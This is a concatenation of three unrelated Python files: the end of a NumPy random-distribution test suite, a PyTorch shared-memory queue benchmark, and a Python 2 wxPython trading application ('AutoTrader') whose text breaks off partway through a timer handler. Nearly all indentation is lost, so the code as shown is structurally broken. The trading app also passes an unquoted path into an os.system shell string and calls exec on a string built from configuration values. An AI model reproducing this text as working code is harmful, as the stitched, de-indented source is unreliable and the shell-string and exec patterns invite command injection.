assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
    # Each config contains the initial seed, a number of raw steps,
    # the md5 hashes of the initial and the final states' keys, and
    # the position of the initial and the final state.
# These were produced using the original C implementation.
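    # A sketch of one entry's shape (field names taken from the accesses below;
    # the values here are illustrative, not real test data):
    #   {"seed": ..., "steps": ...,
    #    "initial": {"pos": ..., "key_md5": "..."},
    #    "jumped": {"pos": ..., "key_md5": "..."}}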
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert md5.hexdigest() == config["initial"]["key_md5"]
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
md5 = hashlib.md5(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert md5.hexdigest() == config["jumped"]["key_md5"]
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
test_shared.py
|
import sys
import time
import torch
from torch.multiprocessing import Process
from torch.multiprocessing import Queue, SimpleQueue
from torch.multiprocessing import JoinableQueue
#q = SimpleQueue()
#q = Queue()
q = JoinableQueue()
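# Benchmark: send 100 large tensors through the queue with and without
# torch shared memory (share_memory_()) and compare the elapsed wall-clock time.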
def torch_shared_mem_process(shared_memory):
counter = 0
start = time.time()
while True:
data = q.get()
counter += 1
if data is None:
print(f'[torch_shared_mem_process_q1] Received with shared memory {shared_memory}: {time.time() - start}')
return
# assert data.is_shared()
del data
def test_mem_share(share_memory):
p = Process(target=torch_shared_mem_process, args=(share_memory, ))
p.start()
start = time.time()
n = 100
for i in range(n):
data = torch.zeros([5, 1280, 720, 3], dtype=torch.float, pin_memory=True)
if share_memory:
data.share_memory_()
q.put(data)
else:
q.put(data.numpy())
q.put(None)
p.join()
return time.time() - start
def test_share_mem():
print()
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
with_shared_memory = test_mem_share(share_memory=True)
no_shared_memory = test_mem_share(share_memory=False)
print(f'Took {no_shared_memory:.1f} s without shared memory.')
print(f'Took {with_shared_memory:.1f} s with shared memory.')
def test_share_memory():
print()
for i in range(100):
t = torch.empty(5, 3, 720, 1280)
t.share_memory_()
q.put(t)
|
autotrader.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: terryh.tp at gmail.com
# wxPython
import wx
from wx.lib.wordwrap import wordwrap
from wxobject import MyFrame, M, C, D, S
import os
import sys
import logging
import re
import datetime
import subprocess
import shlex
import tempfile
import multiprocessing
import multiprocessing.forking
# help pyinstaller, cx_Freeze to include
from ctypes import POINTER, WINFUNCTYPE, c_char_p, c_void_p, c_int, c_ulong
from ctypes.wintypes import BOOL, DWORD, BYTE, INT, LPCWSTR, UINT, ULONG
#import calendar
#from shutil import copyfile
# locale
#import gettext
#_ = gettext.ugettext
# third party module
from configobj import ConfigObj
#help pyinstaller to find
import pytz
#------------------------------------------
from tz import timezones
from wxutils import wxd_to_python, python_to_wxd, showMsg, ShowBusyCursor
from quote.utils import get_now, get_tz_hhmm
# Process
from quote.quoteworker import QuoteWriter
__version__ = u'0.2.1'
__appname__ = u'AutoTrader'
__author__ = u'TerryH'
app_realpath = os.path.realpath(sys.argv[0])
app_dir = os.path.dirname(app_realpath)
market_ini = os.path.join(app_dir, 'config', 'market.ini')
commodity_ini = os.path.join(app_dir, 'config', 'commodity.ini')
strategy_ini = os.path.join(app_dir, 'config', 'strategy.ini')
data_dir = os.path.join(app_dir, 'data')
if not os.path.exists(data_dir):
os.makedirs(data_dir)
re_alphanumeric = re.compile(r'^\w+$')
re_date = re.compile(r'^\d{4}-\d{2}-\d{2}$')
quote_module_dir = 'quote'
QUOTE_SOURCE = [u"", u'DDE']
# fixed name for quoteworker
QUOTE_WRITER_EXE = 'quoteworker.exe'
TRADER_EXE = 'trader.exe'
# support tracking trade time
SUPPORT_TIME = ['min1', 'min2', 'min3', 'min5', 'min15', 'min30', 'hour1',
'day1']
SUPPORT_TIME_NAME = ['1 Min', '2 Min', '3 Min', '5 Min', '15 Min',
'30 Min', '1 Hour', '1 Day']
#SUPPORT_TIME_NAME = ['1 Min':'min1',
# '2 Min':'min2',
# '3 Min':'min3',
# '5 Min':'min5',
# '15 Min':'min15',
# '30 Min':'min30',
# '1 Hour':'hour1',
# '1 Day':'day1'
# }
######################################################
# workaround for the pyinstaller one-file executable pack,
# but now we use cx_Freeze
class _Popen(multiprocessing.forking.Popen):
def __init__(self, *args, **kw):
if hasattr(sys, 'frozen'):
# We have to set original _MEIPASS2 value from sys._MEIPASS
# to get --onefile mode working.
# Last character is stripped in C-loader. We have to add
# '/' or '\\' at the end.
os.putenv('_MEIPASS2', sys._MEIPASS + os.sep)
try:
super(_Popen, self).__init__(*args, **kw)
finally:
if hasattr(sys, 'frozen'):
# On some platforms (e.g. AIX) 'os.unsetenv()' is not
# available. In those cases we cannot delete the variable
# but only set it to the empty string. The bootloader
# can handle this case.
if hasattr(os, 'unsetenv'):
os.unsetenv('_MEIPASS2')
else:
os.putenv('_MEIPASS2', '')
class Process(multiprocessing.Process):
_Popen = _Popen
################################################################################
# start multiprocessing.Process outside wxApp main loop
# now superseded by subprocess.Popen in the following code block
def start_quote_process(quote_method, commodity='', commodity_ini=''):
quote_module = __import__(
"quote.%s" % quote_method, fromlist=[quote_method])
p = multiprocessing.Process(
target=quote_module.main, args=(commodity, commodity_ini))
p.start()
return p
def start_quote_workers(market_ini, commodity_ini, ccode):
p = QuoteWriter(market_ini, commodity_ini, ccode)
p.start()
return p
################################################################################
################################################################################
# start subprocess.Popen outside wxApp main loop
def sub_process_stdout(final_command):
#print final_command
p = subprocess.Popen(shlex.split(final_command), stdout=subprocess.PIPE)
return p
def sub_process(final_command):
#print final_command
p = subprocess.Popen(shlex.split(final_command))
return p
################################################################################
#------------------------------------------
class Mixin(object):
def collect_data(self):
raw_dict = {}
for k in self.field_keys:
if getattr(self.__dict__[k], 'GetValue', False):
raw_dict[k] = self.__dict__[k].GetValue()
elif getattr(self.__dict__[k], 'GetStringSelection', False):
raw_dict[k] = self.__dict__[k].GetStringSelection()
elif getattr(self.__dict__[k], 'GetPath', False):
raw_dict[k] = self.__dict__[k].GetPath()
return raw_dict
def loaditem(self, code=''):
if self.configobj and code in self.configobj:
for k in self.field_keys:
#print k
if self.configobj[code].get(k):
setvalue = self.configobj[code].get(k)
# casting
if setvalue == u'True':
setvalue = True
if setvalue == u'False':
setvalue = False
# datetime date to wx.DateTime
if (isinstance(setvalue, str) or isinstance(setvalue, unicode)) and re_date.search(setvalue):
setvalue = python_to_wxd(setvalue)
if getattr(self.__dict__[k], 'SetValue', False):
self.__dict__[k].SetValue(setvalue)
elif getattr(self.__dict__[k], 'SetStringSelection', False):
self.__dict__[k].SetStringSelection(setvalue)
elif getattr(self.__dict__[k], 'SetPath', False):
self.__dict__[k].SetPath(setvalue)
#------------------------------------------
class Strategy(S, Mixin):
def __init__(self, *args, **kwds):
S.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.configobj = {}
self.inifile = strategy_ini
self.configobj = {}
self.c_obj = ConfigObj(commodity_ini, encoding='utf-8')
self.field_keys = ['strategyfile', 'historyfile', 'ccode',
'period', 'num', 'cost',
'start', 'end', 'sid', 'run'
]
self.require_fields = ['strategyfile', 'ccode', 'period', 'num']
self.ccode.SetItems([v.get('ccode') for k, v in self.c_obj.items()])
self.period.SetItems(SUPPORT_TIME_NAME)
self.loaddata()
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
# extra validate
if not raw_dict.get('num').isdigit():
return False
if raw_dict.get('cost', False) and not raw_dict.get('cost').isdigit():
return False
return True
def get_data_dir(self):
if self.ccode.GetValue():
ccode = self.ccode.GetValue()
dir_name = "%s_%s" % (self.c_obj[ccode].get(
'mcode'), self.c_obj[ccode].get('ccode'))
history_dir = os.path.join(data_dir, dir_name)
if history_dir and not os.path.exists(history_dir):
os.makedirs(history_dir)
return history_dir
return ''
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least have strategy file, commodity code, trading time period and max number of bars will use in strategy."),
_("Strategy"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("Strategy"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
sid = self.sid.GetValue()
                if not sid:
                    # let's find a new sid; ignore races, locks, and looping
                    sid = self.get_new_id()
raw_dict['sid'] = sid
# wx.DateTime
if raw_dict.get('start'):
raw_dict['start'] = wxd_to_python(
raw_dict.get('start')).strftime('%Y-%m-%d')
if raw_dict.get('end'):
raw_dict['end'] = wxd_to_python(
raw_dict.get('end')).strftime('%Y-%m-%d')
if sid not in self.configobj:
# insert
self.configobj[sid] = {}
for key in self.field_keys:
self.configobj[sid][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Destroy()
def onValidate(self, event):
raw_dict = self.collect_data()
if 'strategyfile' in raw_dict:
final_command = r'%s --file "%s"' % (
TRADER_EXE, raw_dict['strategyfile'])
p = sub_process_stdout(final_command)
message = p.stdout.read().strip()
if message:
print "Go , haha ,cauch U", str(message), len(message), len(message.strip())
showMsg(self, message)
else:
showMsg(self, _("No error found"))
def onDelete(self, event):
if self.configobj and self.sid.GetValue():
sid = self.sid.GetValue()
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[sid] # delete & write back
self.configobj.write()
self.Destroy()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def onBackTest(self, event):
print "BackTest"
# you must specify the start date, end date or both
self.onSubmit(event)
self.loaddata()
sid = self.sid.GetValue()
raw_dict = self.configobj[sid]
# condition to run back test
_goBackTest = ((raw_dict.get('start') or raw_dict.get('end')) and
raw_dict.get('strategyfile') and raw_dict.get('historyfile'))
if _goBackTest:
# example command
# python trader.py -his FITX.txt --end 2010/10/13 -b 10 -f stest.py
command_list = [TRADER_EXE, '--file', r'"%s"' %
raw_dict['strategyfile']]
if raw_dict.get('start'):
command_list.append("--start")
command_list.append(raw_dict['start'])
if raw_dict.get('end'):
command_list.append("--end")
command_list.append(raw_dict['end'])
# must have
command_list.append("--history")
command_list.append(r'"%s"' % raw_dict['historyfile'])
final_command = " ".join(command_list)
p = sub_process_stdout(final_command)
message = p.stdout.read().strip()
#message = p.stdout.read()
if message:
# clean windows stdout line break
message = message.replace('\r', "")
fname = os.path.join(tempfile.gettempdir(), "autotrader.csv")
                fp = open(fname, "w")
                fp.write(message)
                fp.close()  # flush the file before opening it with the default app
                os.startfile(fname)
else:
dlg = wx.MessageDialog(self,
_("You must at least, config start date, end date or both, with history file"),
_("Back Test"),
wx.OK | wx.ICON_INFORMATION
)
dlg.ShowModal()
dlg.Destroy()
def get_new_id(self):
start_id = 1
sid = 0
while not sid:
if not str(start_id) in self.configobj:
sid = str(start_id)
return sid
start_id += 1
def loaddata(self):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
#------------------------------------------
class DDEWIN(D, Mixin):
def __init__(self, *args, **kwds):
D.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.configobj = {}
self.field_keys = ['mcode', 'ccode',
'dde1_server', 'dde1_topic', 'dde1_time', 'dde1_price', 'dde1_volume',
'dde2_server', 'dde2_topic', 'dde2_time', 'dde2_price', 'dde2_volume'
] + SUPPORT_TIME
self.require_fields = ['dde1_server', 'dde1_topic',
'dde1_time', 'dde1_price', 'dde1_volume']
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input DD1, time, price and volume, can refer from Excel."),
_("DDE"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("DDE"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
# TODO
self.GetParent().update_quote(raw_dict, self.field_keys)
self.Destroy()
def onCancel(self, event):
self.Close()
def onDelete(self, event):
if self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
self.GetParent().delete_quote()
self.Destroy()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
#------------------------------------------
class Commodity(C, Mixin):
def __init__(self, *args, **kwds):
C.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.field_keys = ['cname', 'ccode', 'mcode', 'cpov',
'csource', 'cdir']
self.require_fields = ['cname', 'ccode', 'mcode']
self.inifile = commodity_ini
self.configobj = {}
self.m_obj = ConfigObj(market_ini, encoding='utf-8')
self.markets = [(v.get('mname'), v.get('mcode')) for k,
v in self.m_obj.items()]
self.loaddata()
self.csource.SetItems(QUOTE_SOURCE)
self.mcode.SetItems([mcode for mname, mcode in self.markets])
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
if not re_alphanumeric.search(raw_dict.get('ccode')):
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input Commodity Name, Commodity Code (alphanumeric), and Quote Folder for real time data processing, better at a ram disk folder."),
_("Market"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?") +
' ' + _("Remember to restart to ative changes."),
_("Market"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
ccode = raw_dict['ccode'].upper()
raw_dict['ccode'] = ccode
if ccode not in self.configobj:
self.configobj[ccode] = {}
#print raw_dict
for key in self.field_keys:
self.configobj[ccode][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Close()
def onSource(self, event):
if self.csource.GetStringSelection():
self.config.Enable()
else:
self.config.Enable(False)
def onConfig(self, event):
raw_dict = self.collect_data()
source = raw_dict.get('csource')
mcode = raw_dict.get('mcode')
ccode = raw_dict.get('ccode')
if source and source in QUOTE_SOURCE:
support_time = SUPPORT_TIME # FIXME, check this value
try:
exec('support_time = %s_SUPPORT_TIME' % source)
except:
pass # FIXME, better chance to load support field
try:
__import__("quote.%s" % (source), fromlist=[source])
dlg = DDEWIN(self) # FIXME, add more config
dlg.mcode.SetValue(mcode)
dlg.ccode.SetValue(ccode)
self.loaddata() # reload data again to make sure
if self.configobj.get(ccode):
dlg.configobj = self.configobj.get(ccode)
dlg.loaditem('quote')
dlg.ShowModal()
dlg.Destroy()
except ImportError:
self.GetParent().loginfo(_('No support quote module found.'))
def onHistory(self, event):
history_dir = self.check_history()
if history_dir:
if os.name == 'nt':
os.startfile(history_dir)
elif os.name == 'posix':
try:
os.system('xdg-open %s' % history_dir)
                # try to open history folder on linux
except:
pass # TODO
def check_history(self):
dir_name = ''
history_dir = ''
if self.ccode.GetValue() and self.mcode.GetStringSelection():
self.history.Enable()
dir_name = "%s_%s" % (self.mcode.GetStringSelection(
), self.ccode.GetValue().upper())
history_dir = os.path.join(data_dir, dir_name)
if history_dir and not os.path.exists(history_dir):
os.makedirs(history_dir)
return history_dir
else:
self.history.Enable(False)
return
def onMcode(self, event):
self.check_history()
def onDelete(self, event):
ccode = self.ccode.GetValue().upper()
if ccode and ccode in self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[ccode]
self.configobj.write()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def loaddata(self, m_obj={}):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
if m_obj:
self.m_obj = m_obj
def set_market_obj(self, m_obj={}):
if m_obj:
self.m_obj = m_obj
def update_quote(self, quote_obj={}, field_keys=[]):
if self.configobj and self.ccode.GetValue() and self.configobj.get(self.ccode.GetValue()):
cid = self.ccode.GetValue()
if not self.configobj[cid].get('quote', False):
self.configobj[cid]['quote'] = {}
for k in field_keys:
self.configobj[cid]['quote'][k] = quote_obj.get(k, '')
self.configobj.write()
def delete_quote(self):
if self.configobj and self.ccode.GetValue() and self.configobj.get(self.ccode.GetValue()):
del self.configobj[self.ccode.GetValue()]['quote']
self.configobj.write()
def loaditem(self, ccode=''):
super(Commodity, self).loaditem(ccode)
if self.csource.GetStringSelection():
self.config.Enable()
if self.ccode.GetValue() and self.mcode.GetStringSelection():
self.history.Enable()
#------------------------------------------
class Market(M, Mixin):
def __init__(self, *args, **kwds):
M.__init__(self, *args, **kwds)
wx.EVT_CHAR_HOOK(self, self.onKey)
self.field_keys = ['mname', 'mcode', 'mtimezone', 'mclear',
's1_start', 's1_end', 's2_start', 's2_end',
'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6'
]
self.require_fields = ['mname', 'mcode', 'mtimezone',
'mclear', 's1_start', 's1_end']
self.inifile = market_ini
self.configobj = {}
self.loaddata()
self.mtimezone.SetItems(timezones)
def validate(self, raw_dict={}):
for key in self.require_fields:
if not raw_dict.get(key, False):
return False
if not re_alphanumeric.search(raw_dict.get('mcode')):
return False
# special check for time 24HHMM
if raw_dict['mclear'] == u'00:00' or raw_dict['s1_end'] == u'00:00':
return False
return True
def onSubmit(self, event):
raw_dict = self.collect_data()
if not self.validate(raw_dict):
dlg = wx.MessageDialog(self,
_("You must at least input Market Name, Market Code (alphanumeric), Session Clear Time and Session 1 Time"),
_("Market"),
wx.OK | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
else:
dlg = wx.MessageDialog(self,
_("Are you sure want to update?"),
_("Market"),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
mcode = raw_dict['mcode'].upper()
raw_dict['mcode'] = mcode
if raw_dict['mcode'] not in self.configobj:
self.configobj[mcode] = {}
for key in self.field_keys:
self.configobj[mcode][key] = raw_dict.get(key, '')
self.configobj.write() # write ini file
self.Close()
def onCancel(self, event):
self.Close()
def onDelete(self, event):
mcode = self.mcode.GetValue().upper()
if mcode and mcode in self.configobj:
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Delete'),
wx.YES_NO | wx.YES_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
del self.configobj[mcode]
self.configobj.write()
self.Destroy()
def onKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def loaddata(self):
self.configobj = ConfigObj(self.inifile, encoding='utf-8')
#------------------------------------------
class FF(MyFrame):
def __init__(self, *args, **kwds):
MyFrame.__init__(self, *args, **kwds)
self.quote_process = {}
self.quote_workers = {}
self.trader = {}
self.strategy_process = {}
# main application timer
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.onTimer, self.timer)
self.timer.Start(1000 * 10)
self.m_obj = {} # market
self.c_obj = {} # commodity
self.s_obj = {} # strategy
self.market_ini = market_ini
self.commodity_ini = commodity_ini
self.strategy_ini = strategy_ini
self.data_ids = ['username', 'password', 'cert',
'certpass', 'autostart', ] # 'sctrl','actrl']
self.logfilename = os.path.join(app_dir, "autotrader.log")
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
filename=self.logfilename,
)
self.logger = logging.getLogger('')
# Market
self.mctrl.InsertColumn(0, _("Market Name"))
self.mctrl.InsertColumn(1, _("Market Code"))
self.mctrl.InsertColumn(2, _("Market Time Zone"))
# Commodity
self.cctrl.InsertColumn(0, _("Commodity Name"))
self.cctrl.InsertColumn(1, _("Commodity Code"))
self.cctrl.InsertColumn(2, _("Market Code"))
self.cctrl.InsertColumn(3, _("Quote Source"))
self.cctrl.InsertColumn(4, _("Quote Folder"))
# Strategy
self.sctrl.InsertColumn(0, _("Id"))
self.sctrl.InsertColumn(1, _("Commodity Code"))
self.sctrl.InsertColumn(2, _("Program File"))
self.sctrl.InsertColumn(3, _("Time Period"))
self.loaddata()
self.render_all()
# test
self.test = None
def onMarket(self, event):
dlg = Market(self)
dlg.ShowModal()
dlg.Destroy()
self.load_market()
self.render_market()
def onMarketActive(self, event):
item_index = event.m_itemIndex
mcode = self.mctrl.GetItem(item_index, 1).GetText()
dlg = Market(self)
dlg.loaditem(mcode)
dlg.ShowModal()
dlg.Destroy()
self.load_market()
self.render_market()
def onCommodity(self, event):
dlg = Commodity(self)
dlg.ShowModal()
dlg.Destroy()
self.loaddata()
self.render_commodity()
def onCommodityActive(self, event):
item_index = event.m_itemIndex
ccode = self.cctrl.GetItem(item_index, 1).GetText()
dlg = Commodity(self)
dlg.loaditem(ccode)
dlg.ShowModal()
dlg.Destroy()
self.load_commodity()
self.render_commodity()
def onStrategy(self, event):
dlg = Strategy(self)
dlg.ShowModal()
dlg.Destroy()
self.load_strategy()
self.render_strategy()
def onStrategyActive(self, event):
item_index = event.m_itemIndex
sid = self.sctrl.GetItem(item_index, 0).GetText()
dlg = Strategy(self)
dlg.loaditem(sid)
dlg.ShowModal()
dlg.Destroy()
self.load_strategy()
self.render_strategy()
def OnCheckItem(self, index, flag):
sid = self.sctrl.GetItem(index, 0).GetText()
#print index, flag, sid
if self.s_obj.get(sid, False):
# toggle run key value
if flag:
self.s_obj[sid]['run'] = True
else:
self.s_obj[sid]['run'] = ""
self.s_obj.write()
def onSave(self, event):
dd = {}
for k in self.data_ids:
item = getattr(self, k)
if hasattr(item, 'GetValue'):
if k == 'username':
dd[k] = item.GetValue().upper()
else:
dd[k] = item.GetValue()
elif hasattr(item, 'GetPath'):
dd[k] = item.GetPath()
self.data = dd
def onAbout(self, event):
info = wx.AboutDialogInfo()
info.Name = __appname__
info.Version = __version__
info.Copyright = __author__
info.Description = wordwrap(
_("An easy tool for you to trade any commodity you like.\nLicense: MIT for individual, GPL for none individual.\n Author: TerryH"),
350, wx.ClientDC(self))
info.WebSite = (u"http://terryh.tp.blogspot.com/", u"TerryH's Blog")
wx.AboutBox(info)
def onQuit(self, event):
dlg = wx.MessageDialog(self,
_('Are you sure?'),
_('Close'),
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_INFORMATION
)
val = dlg.ShowModal()
dlg.Destroy()
if val == wx.ID_YES:
# close all process
self.stop_process()
self.Destroy()
def onTimer(self, event):
"""
create process for quote service, strategy start or stop
"""
#self.loginfo('onTimer')
for k, v in self.c_obj.items():
if v.get('csource'):
ccode = v['ccode'] # commodity code
mcode = v['mcode'] # market code
source = v['csource']
mtimezone = self.m_obj[mcode]['mtimezone']
session_start = ''
session_end = ''
mclear = self.m_obj[mcode]['mclear']
s1_start = self.m_obj[mcode]['s1_start']
s1_end = self.m_obj[mcode]['s1_end']
s2_end = self.m_obj[mcode]['s2_end']
if mclear and mclear != '00:00':
session_start = mclear
elif s1_start and s1_start != '00:00':
                    session_start = s1_start
if s2_end and s2_end != '00:00':
session_end = s2_end
elif s1_end and s1_end != '00:00':
session_end = s1_end
key = "%s_%s" % (mcode, ccode)
                # commodity ConfigObj; get quote dir
com_data_dir = os.path.join(app_dir, 'data', mcode, ccode)
if v.get('cdir', False):
com_quote_dir = os.path.join(
v.get('cdir'), 'data', mcode, ccode)
else:
# parent folder data/mcode/ccode
com_quote_dir = com_data_dir
#self.loginfo(str(self.quote_process))
if self.should_running(session_start, session_end, mtimezone):
# check this quote should running
if key not in self.quote_process:
# not running quote process
#s_hour, s_minute = map(int, session_start.split(':',1))
#now = get_now(mtimezone)
#market_start_time = get_tz_hhmm(s_hour, s_minute, mtimezone)
# we must start app 1 minute before market open
#if (market_start_time-now).seconds < 60:
#quote_module = __import__("quote.%s" % source , fromlist=[source])
quote_exe = source + ".exe"
#--------------------------------------------------
                        # TODO: no longer used, REMOVE
# start_quote_process and start_quote_workers
#t = start_quote_process( source, ccode, self.commodity_ini )
#self.quote_process[key] = t
#w = start_quote_workers(self.market_ini, self.commodity_ini, ccode)
#self.quote_workers[key] = w
#--------------------------------------------------
#--------------------------------------------------
# FIXME, need to uncomment
                        # launch the quote source and quote worker via sub_process;
                        # file paths are quoted in case they contain spaces
final_command = '%s --config "%s" --commodity %s' % (
quote_exe, self.commodity_ini, ccode)
self.loginfo(final_command)
